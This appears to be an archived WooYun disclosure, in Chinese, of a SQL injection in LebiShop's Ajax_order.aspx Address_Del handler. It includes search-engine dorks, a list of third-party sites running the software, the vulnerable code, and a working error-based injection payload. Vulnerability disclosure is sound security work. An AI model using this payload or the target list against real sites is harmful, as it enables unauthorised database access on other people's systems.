乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-09: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
官网 http://www.lebi.cn/demo站点 http://demo.lebi.cn/用google搜索 关键词 intext:Powered by LebiShop或者google搜索关键词Powered by LebiShop inurl:Category.aspx
下面是一部分案例 安装量是有的
http://168dev.com/lebishop/Category.aspxhttp://oa.psy123.com.cn/AllCategories.aspxhttp://www.huacaiye.com/Category.aspx?tid=1http://daiba.com.cn/Category.aspx?id=9http://hkapp.cn/EN/Category.aspx?id=10http://54mbb.com/EN/NewsDetails.aspx?id=5http://shop.lutoog.com/Brand.aspx?id=189http://queengift.net/EN/Brand.aspx?id=190http://www.snsrn.com/en/http://www.skycastle100.com/Search.aspx?keyword=lianyiquanhttp://71pg.com/Category.aspx?tid=35http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2http://lovedou.com/en/http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1http://newautoch.com/NewsDetails.aspx?id=5http://memy.cc/http://www.thanks789.com/Brand.aspx?id=191http://m.gzyytz.cn/http://www.thanks789.com/Brand.aspx?id=191
漏洞地址
http://demo.lebi.cn/ajax/Ajax_order.aspx
public void Address_Del(){ string str = RequestTool.RequestString("id"); //只是处理了单引号 这里不需要单引号 if (str == "") { base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}"); } else { B_Lebi_User_Address.Delete(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id in(", str, ")" }));//存在注入 if (B_Lebi_User_Address.GetModel(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id = ", base.CurrentUser.User_Address_id })) == null) { if (B_Lebi_User_Address.GetModel("User_id = " + base.CurrentUser.id) != null) { base.CurrentUser.User_Address_id = B_Lebi_User_Address.GetMaxId("User_id=" + base.CurrentUser.id); } B_Lebi_User.Update(base.CurrentUser); } base.Response.Write("{\"msg\":\"OK\"}"); }}
漏洞证明访问
post提交
__Action=Address_Del&id=-1) and convert(int,@@version)>0--
漏洞证明如上
对id进行处理
未能联系到厂商或者厂商积极拒绝